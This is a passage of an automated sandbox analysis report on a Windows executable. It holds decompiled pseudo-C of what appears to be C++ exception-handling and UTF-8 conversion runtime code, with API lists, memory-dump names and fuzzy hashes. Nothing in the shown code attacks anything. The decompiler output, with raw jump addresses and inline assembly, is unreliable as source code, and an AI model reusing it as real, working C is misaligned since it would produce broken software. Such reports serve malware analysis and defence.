                                                                                                                                                                                                                                                        				if (_t128 - 0xffffffff < 0) goto 0xe5abe0ff;
                                                                                                                                                                                                                                                        				if (_t128 - _t280[1] >= 0) goto 0xe5abe0ff;
                                                                                                                                                                                                                                                        				if ( *_t236 != 0xe06d7363) goto 0xe5abdd7c;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0xe5abdd7c;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0xe5abdd7c;
                                                                                                                                                                                                                                                        				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0xe5abdd7c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABCD20(_t220);
                                                                                                                                                                                                                                                        				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0xe5abe098;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABCD20(_t220);
                                                                                                                                                                                                                                                        				_t237 =  *((intOrPtr*)(_t220 + 0x20));
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABCD20(_t220);
                                                                                                                                                                                                                                                        				 *((char*)(_t284 + 0x60)) = 1;
                                                                                                                                                                                                                                                        				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABD6F0(_t220,  *((intOrPtr*)(_t237 + 0x38)));
                                                                                                                                                                                                                                                        				if ( *_t237 != 0xe06d7363) goto 0xe5abdd34;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0xe5abdd34;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0xe5abdd34;
                                                                                                                                                                                                                                                        				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0xe5abe0ff;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABCD20(_t220);
                                                                                                                                                                                                                                                        				if ( *(_t220 + 0x38) == 0) goto 0xe5abdd7c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABCD20(_t220);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABCD20(_t220);
                                                                                                                                                                                                                                                        				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABEC38(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0xe5abdd77;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABED28(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0xe5abe0dc;
                                                                                                                                                                                                                                                        				goto 0xe5abe0b8;
                                                                                                                                                                                                                                                        				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
                                                                                                                                                                                                                                                        				 *(_t282 - 0x48) = _t280;
                                                                                                                                                                                                                                                        				if ( *_t237 != 0xe06d7363) goto 0xe5abe04f;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0xe5abe04f;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0xe5abe04f;
                                                                                                                                                                                                                                                        				r15d = 0;
                                                                                                                                                                                                                                                        				if (_t280[3] - r15d <= 0) goto 0xe5abdf80;
                                                                                                                                                                                                                                                        				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
                                                                                                                                                                                                                                                        				 *(_t284 + 0x20) = _t280;
                                                                                                                                                                                                                                                        				r8d = r14d;
                                                                                                                                                                                                                                                        				_t145 = E00007FF67FF6E5ABD3DC(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
                                                                                                                                                                                                                                                        				asm("movups xmm0, [ebp-0x28]");
                                                                                                                                                                                                                                                        				asm("movdqu [ebp-0x38], xmm0");
                                                                                                                                                                                                                                                        				asm("psrldq xmm0, 0x8");
                                                                                                                                                                                                                                                        				asm("movd eax, xmm0");
                                                                                                                                                                                                                                                        				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0xe5abdf80;
                                                                                                                                                                                                                                                        				_t296 =  *((intOrPtr*)(_t282 - 0x28));
                                                                                                                                                                                                                                                        				r13d =  *((intOrPtr*)(_t282 - 0x30));
                                                                                                                                                                                                                                                        				 *((long long*)(_t282 - 0x80)) = _t296;
                                                                                                                                                                                                                                                        				_t146 = r13d;
                                                                                                                                                                                                                                                        				asm("inc ecx");
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
                                                                                                                                                                                                                                                        				asm("movd eax, xmm0");
                                                                                                                                                                                                                                                        				asm("movups [ebp-0x60], xmm0");
                                                                                                                                                                                                                                                        				if (_t146 - r14d > 0) goto 0xe5abdf73;
                                                                                                                                                                                                                                                        				_t226 =  *(_t282 - 0x60) >> 0x20;
                                                                                                                                                                                                                                                        				if (r14d - _t146 > 0) goto 0xe5abdf73;
                                                                                                                                                                                                                                                        				r12d = r15d;
                                                                                                                                                                                                                                                        				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
                                                                                                                                                                                                                                                        				_t313 =  *(_t282 - 0x58) >> 0x20;
                                                                                                                                                                                                                                                        				 *((long long*)(_t282 - 0x70)) = _t267;
                                                                                                                                                                                                                                                        				if (r15d == 0) goto 0xe5abdf60;
                                                                                                                                                                                                                                                        				asm("movups xmm0, [edx+ecx*4]");
                                                                                                                                                                                                                                                        				asm("movups [ebp-0x8], xmm0");
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + 0x10 + (_t226 + _t226 * 4) * 4));
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABD6C4(_t226);
                                                                                                                                                                                                                                                        				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
                                                                                                                                                                                                                                                        				 *((long long*)(_t284 + 0x70)) = _t228;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABD6C4(_t228);
                                                                                                                                                                                                                                                        				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
                                                                                                                                                                                                                                                        				if (_t176 <= 0) goto 0xe5abdef0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABD6C4(_t228);
                                                                                                                                                                                                                                                        				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABE324(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0xe5abdf01;
                                                                                                                                                                                                                                                        				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
                                                                                                                                                                                                                                                        				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
                                                                                                                                                                                                                                                        				if (_t154 > 0) goto 0xe5abdeb4;
                                                                                                                                                                                                                                                        				r12d = r12d + 1;
                                                                                                                                                                                                                                                        				if (r12d == r15d) goto 0xe5abdf67;
                                                                                                                                                                                                                                                        				goto 0xe5abde6d;
                                                                                                                                                                                                                                                        				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
                                                                                                                                                                                                                                                        				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
                                                                                                                                                                                                                                                        				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
                                                                                                                                                                                                                                                        				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
                                                                                                                                                                                                                                                        				 *(_t284 + 0x38) = _t282 - 0x60;
                                                                                                                                                                                                                                                        				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
                                                                                                                                                                                                                                                        				 *(_t284 + 0x28) = _t282 - 8;
                                                                                                                                                                                                                                                        				 *(_t284 + 0x20) = _t280;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABDB5C(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
                                                                                                                                                                                                                                                        				goto 0xe5abdf6c;
                                                                                                                                                                                                                                                        				goto 0xe5abdf70;
                                                                                                                                                                                                                                                        				r15d = 0;
                                                                                                                                                                                                                                                        				r13d = r13d + 1;
                                                                                                                                                                                                                                                        				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0xe5abde05;
                                                                                                                                                                                                                                                        				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0xe5abe08c;
                                                                                                                                                                                                                                                        				_t209 = _t280[8] - r15d;
                                                                                                                                                                                                                                                        				if (_t209 == 0) goto 0xe5abdfa6;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABD6B0(_t282 - 8);
                                                                                                                                                                                                                                                        				if (_t209 != 0) goto 0xe5abdfc7;
                                                                                                                                                                                                                                                        				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0xe5abe08c;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABD280(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0xe5abe08c;
                                                                                                                                                                                                                                                        				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0xe5abe0e2;
                                                                                                                                                                                                                                                        				if (_t280[8] == r15d) goto 0xe5abdfec;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABD6B0(_t282 - 8 + _t280[8]);
                                                                                                                                                                                                                                                        				_t235 = _t280[8];
                                                                                                                                                                                                                                                        				goto 0xe5abdfef;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABEC38(_t235, _t237, _t237, _t313, _t281) != 0) goto 0xe5abe08c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABD310(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
                                                                                                                                                                                                                                                        				_t177 =  *((intOrPtr*)(_t282 + 0x98));
                                                                                                                                                                                                                                                        				 *(_t284 + 0x50) = _t177;
                                                                                                                                                                                                                                                        				_t178 = _t177 | 0xffffffff;
                                                                                                                                                                                                                                                        				 *((long long*)(_t284 + 0x48)) = _t281;
                                                                                                                                                                                                                                                        				 *(_t284 + 0x40) = _t313;
                                                                                                                                                                                                                                                        				 *(_t284 + 0x38) = _t178;
                                                                                                                                                                                                                                                        				 *(_t284 + 0x30) = _t178;
                                                                                                                                                                                                                                                        				 *(_t284 + 0x28) = _t280;
                                                                                                                                                                                                                                                        				 *(_t284 + 0x20) = _t313;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABD51C( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
                                                                                                                                                                                                                                                        				goto 0xe5abe08c;
                                                                                                                                                                                                                                                        				if (_t280[3] <= 0) goto 0xe5abe08c;
                                                                                                                                                                                                                                                        				if ( *((char*)(_t282 + 0x98)) != 0) goto 0xe5abe0ff;
                                                                                                                                                                                                                                                        				 *(_t284 + 0x38) = _t307;
                                                                                                                                                                                                                                                        				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
                                                                                                                                                                                                                                                        				 *(_t284 + 0x28) = r14d;
                                                                                                                                                                                                                                                        				 *(_t284 + 0x20) = _t280;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABE108(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
                                                                                                                                                                                                                                                        				_t173 = E00007FF67FF6E5ABCD20(_t235);
                                                                                                                                                                                                                                                        				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0xe5abe0ff;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
                                                                                                                                                                                                                                                        			}
































                                                                                                                                                                                                                                                        0x7ff6e5abdc30
                                                                                                                                                                                                                                                        0x7ff6e5abdc3d
                                                                                                                                                                                                                                                        0x7ff6e5abdc42
                                                                                                                                                                                                                                                        0x7ff6e5abdc49
                                                                                                                                                                                                                                                        0x7ff6e5abdc50
                                                                                                                                                                                                                                                        0x7ff6e5abdc53
                                                                                                                                                                                                                                                        0x7ff6e5abdc57
                                                                                                                                                                                                                                                        0x7ff6e5abdc61
                                                                                                                                                                                                                                                        0x7ff6e5abdc6b
                                                                                                                                                                                                                                                        0x7ff6e5abdc70
                                                                                                                                                                                                                                                        0x7ff6e5abdc73
                                                                                                                                                                                                                                                        0x7ff6e5abdc7e
                                                                                                                                                                                                                                                        0x7ff6e5abdc85
                                                                                                                                                                                                                                                        0x7ff6e5abdc8a
                                                                                                                                                                                                                                                        0x7ff6e5abdc8d
                                                                                                                                                                                                                                                        0x7ff6e5abdc92
                                                                                                                                                                                                                                                        0x7ff6e5abdc98
                                                                                                                                                                                                                                                        0x7ff6e5abdca1
                                                                                                                                                                                                                                                        0x7ff6e5abdcad
                                                                                                                                                                                                                                                        0x7ff6e5abdcb7
                                                                                                                                                                                                                                                        0x7ff6e5abdcc8
                                                                                                                                                                                                                                                        0x7ff6e5abdcd3
                                                                                                                                                                                                                                                        0x7ff6e5abdcd9
                                                                                                                                                                                                                                                        0x7ff6e5abdce3
                                                                                                                                                                                                                                                        0x7ff6e5abdce9
                                                                                                                                                                                                                                                        0x7ff6e5abdcee
                                                                                                                                                                                                                                                        0x7ff6e5abdcf2
                                                                                                                                                                                                                                                        0x7ff6e5abdcfb
                                                                                                                                                                                                                                                        0x7ff6e5abdd04
                                                                                                                                                                                                                                                        0x7ff6e5abdd09
                                                                                                                                                                                                                                                        0x7ff6e5abdd14
                                                                                                                                                                                                                                                        0x7ff6e5abdd1a
                                                                                                                                                                                                                                                        0x7ff6e5abdd27
                                                                                                                                                                                                                                                        0x7ff6e5abdd2e
                                                                                                                                                                                                                                                        0x7ff6e5abdd34
                                                                                                                                                                                                                                                        0x7ff6e5abdd3e
                                                                                                                                                                                                                                                        0x7ff6e5abdd40
                                                                                                                                                                                                                                                        0x7ff6e5abdd49
                                                                                                                                                                                                                                                        0x7ff6e5abdd54
                                                                                                                                                                                                                                                        0x7ff6e5abdd60
                                                                                                                                                                                                                                                        0x7ff6e5abdd6c
                                                                                                                                                                                                                                                        0x7ff6e5abdd72
                                                                                                                                                                                                                                                        0x7ff6e5abdd80
                                                                                                                                                                                                                                                        0x7ff6e5abdd84
                                                                                                                                                                                                                                                        0x7ff6e5abdd8e
                                                                                                                                                                                                                                                        0x7ff6e5abdd98
                                                                                                                                                                                                                                                        0x7ff6e5abdda9
                                                                                                                                                                                                                                                        0x7ff6e5abddaf
                                                                                                                                                                                                                                                        0x7ff6e5abddb6
                                                                                                                                                                                                                                                        0x7ff6e5abddc6
                                                                                                                                                                                                                                                        0x7ff6e5abddd1
                                                                                                                                                                                                                                                        0x7ff6e5abddd6
                                                                                                                                                                                                                                                        0x7ff6e5abddd9
                                                                                                                                                                                                                                                        0x7ff6e5abddde
                                                                                                                                                                                                                                                        0x7ff6e5abdde2
                                                                                                                                                                                                                                                        0x7ff6e5abdde7
                                                                                                                                                                                                                                                        0x7ff6e5abddec
                                                                                                                                                                                                                                                        0x7ff6e5abddf3
                                                                                                                                                                                                                                                        0x7ff6e5abddf9
                                                                                                                                                                                                                                                        0x7ff6e5abddfd
                                                                                                                                                                                                                                                        0x7ff6e5abde01
                                                                                                                                                                                                                                                        0x7ff6e5abde10
                                                                                                                                                                                                                                                        0x7ff6e5abde1f
                                                                                                                                                                                                                                                        0x7ff6e5abde29
                                                                                                                                                                                                                                                        0x7ff6e5abde2c
                                                                                                                                                                                                                                                        0x7ff6e5abde30
                                                                                                                                                                                                                                                        0x7ff6e5abde37
                                                                                                                                                                                                                                                        0x7ff6e5abde41
                                                                                                                                                                                                                                                        0x7ff6e5abde48
                                                                                                                                                                                                                                                        0x7ff6e5abde4e
                                                                                                                                                                                                                                                        0x7ff6e5abde54
                                                                                                                                                                                                                                                        0x7ff6e5abde5c
                                                                                                                                                                                                                                                        0x7ff6e5abde60
                                                                                                                                                                                                                                                        0x7ff6e5abde67
                                                                                                                                                                                                                                                        0x7ff6e5abde74
                                                                                                                                                                                                                                                        0x7ff6e5abde78
                                                                                                                                                                                                                                                        0x7ff6e5abde80
                                                                                                                                                                                                                                                        0x7ff6e5abde83
                                                                                                                                                                                                                                                        0x7ff6e5abde94
                                                                                                                                                                                                                                                        0x7ff6e5abde97
                                                                                                                                                                                                                                                        0x7ff6e5abde9c
                                                                                                                                                                                                                                                        0x7ff6e5abdea9
                                                                                                                                                                                                                                                        0x7ff6e5abdeac
                                                                                                                                                                                                                                                        0x7ff6e5abdeb2
                                                                                                                                                                                                                                                        0x7ff6e5abdeb4
                                                                                                                                                                                                                                                        0x7ff6e5abdecf
                                                                                                                                                                                                                                                        0x7ff6e5abdeda
                                                                                                                                                                                                                                                        0x7ff6e5abdee0
                                                                                                                                                                                                                                                        0x7ff6e5abdee6
                                                                                                                                                                                                                                                        0x7ff6e5abdee8
                                                                                                                                                                                                                                                        0x7ff6e5abdeee
                                                                                                                                                                                                                                                        0x7ff6e5abdef0
                                                                                                                                                                                                                                                        0x7ff6e5abdef6
                                                                                                                                                                                                                                                        0x7ff6e5abdefc
                                                                                                                                                                                                                                                        0x7ff6e5abdf1a
                                                                                                                                                                                                                                                        0x7ff6e5abdf22
                                                                                                                                                                                                                                                        0x7ff6e5abdf2a
                                                                                                                                                                                                                                                        0x7ff6e5abdf35
                                                                                                                                                                                                                                                        0x7ff6e5abdf3d
                                                                                                                                                                                                                                                        0x7ff6e5abdf46
                                                                                                                                                                                                                                                        0x7ff6e5abdf4f
                                                                                                                                                                                                                                                        0x7ff6e5abdf54
                                                                                                                                                                                                                                                        0x7ff6e5abdf59
                                                                                                                                                                                                                                                        0x7ff6e5abdf5e
                                                                                                                                                                                                                                                        0x7ff6e5abdf65
                                                                                                                                                                                                                                                        0x7ff6e5abdf70
                                                                                                                                                                                                                                                        0x7ff6e5abdf73
                                                                                                                                                                                                                                                        0x7ff6e5abdf7a
                                                                                                                                                                                                                                                        0x7ff6e5abdf8c
                                                                                                                                                                                                                                                        0x7ff6e5abdf92
                                                                                                                                                                                                                                                        0x7ff6e5abdf96
                                                                                                                                                                                                                                                        0x7ff6e5abdf98
                                                                                                                                                                                                                                                        0x7ff6e5abdfa4
                                                                                                                                                                                                                                                        0x7ff6e5abdfae
                                                                                                                                                                                                                                                        0x7ff6e5abdfc1
                                                                                                                                                                                                                                                        0x7ff6e5abdfcf
                                                                                                                                                                                                                                                        0x7ff6e5abdfd9
                                                                                                                                                                                                                                                        0x7ff6e5abdfdb
                                                                                                                                                                                                                                                        0x7ff6e5abdfe3
                                                                                                                                                                                                                                                        0x7ff6e5abdfea
                                                                                                                                                                                                                                                        0x7ff6e5abdff9
                                                                                                                                                                                                                                                        0x7ff6e5abe00c
                                                                                                                                                                                                                                                        0x7ff6e5abe011
                                                                                                                                                                                                                                                        0x7ff6e5abe022
                                                                                                                                                                                                                                                        0x7ff6e5abe026
                                                                                                                                                                                                                                                        0x7ff6e5abe029
                                                                                                                                                                                                                                                        0x7ff6e5abe02e
                                                                                                                                                                                                                                                        0x7ff6e5abe033
                                                                                                                                                                                                                                                        0x7ff6e5abe037
                                                                                                                                                                                                                                                        0x7ff6e5abe03e
                                                                                                                                                                                                                                                        0x7ff6e5abe043
                                                                                                                                                                                                                                                        0x7ff6e5abe048
                                                                                                                                                                                                                                                        0x7ff6e5abe04d
                                                                                                                                                                                                                                                        0x7ff6e5abe053
                                                                                                                                                                                                                                                        0x7ff6e5abe05c
                                                                                                                                                                                                                                                        0x7ff6e5abe06b
                                                                                                                                                                                                                                                        0x7ff6e5abe073
                                                                                                                                                                                                                                                        0x7ff6e5abe07a
                                                                                                                                                                                                                                                        0x7ff6e5abe082
                                                                                                                                                                                                                                                        0x7ff6e5abe087
                                                                                                                                                                                                                                                        0x7ff6e5abe08c
                                                                                                                                                                                                                                                        0x7ff6e5abe096
                                                                                                                                                                                                                                                        0x7ff6e5abe0b7

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                        • Opcode ID: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                                                                                                                                                                                                                        • Instruction ID: 14abb9340f1e8ea68bd163f1ee5bc9a233db77bbb7345dbca2bbeb109e02280a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14E16073A0864986EBA0AF69D4503AD37A0FF44B98F100535EE4DD7B59CF39E890C786
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6E5AB101D), ref: 00007FF6E5AB769F
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6E5AB101D), ref: 00007FF6E5AB76EF
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                                        • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                                                        • API String ID: 626452242-27947307
                                                                                                                                                                                                                                                        • Opcode ID: d9d72b3d70819d691a45a5c69d72243a1061b564855b32675f65c1480a0ef4ee
                                                                                                                                                                                                                                                        • Instruction ID: fc8426c25ccae6f4a1bf862f12910cd8e87ac4e348eea422def10400ee0fed48
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9d72b3d70819d691a45a5c69d72243a1061b564855b32675f65c1480a0ef4ee
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C741BD33B08B8281D660EF19A46027AA3A5FF84B94F584135DE8CC7B98DF7DD891C749
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00007FF6E5AB3699), ref: 00007FF6E5AB7B81
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E5AB7744,?,?,?,?,?,?,?,?,?,?,?,00007FF6E5AB101D), ref: 00007FF6E5AB2654
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB2620: MessageBoxW.USER32 ref: 00007FF6E5AB272C
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00007FF6E5AB3699), ref: 00007FF6E5AB7BF5
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                                                        • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                                                        • API String ID: 3723044601-27947307
                                                                                                                                                                                                                                                        • Opcode ID: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                                                                                                                                                                                                                        • Instruction ID: df9f7fdc7b6cf5723b335c3b7a22a7ff5dad0b771ad6a91db88895a030fa3121
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E721CE72B08B4680EA50EF19A82027972A1EF84F84F884535CB0DC3759EFBEED518749
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 55%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC9264(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, void* __r9, void* __r10, void* __r11, long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                                                                                                                                                                        				void* _v72;
                                                                                                                                                                                                                                                        				intOrPtr _v80;
                                                                                                                                                                                                                                                        				intOrPtr _v84;
                                                                                                                                                                                                                                                        				intOrPtr _v88;
                                                                                                                                                                                                                                                        				intOrPtr _v92;
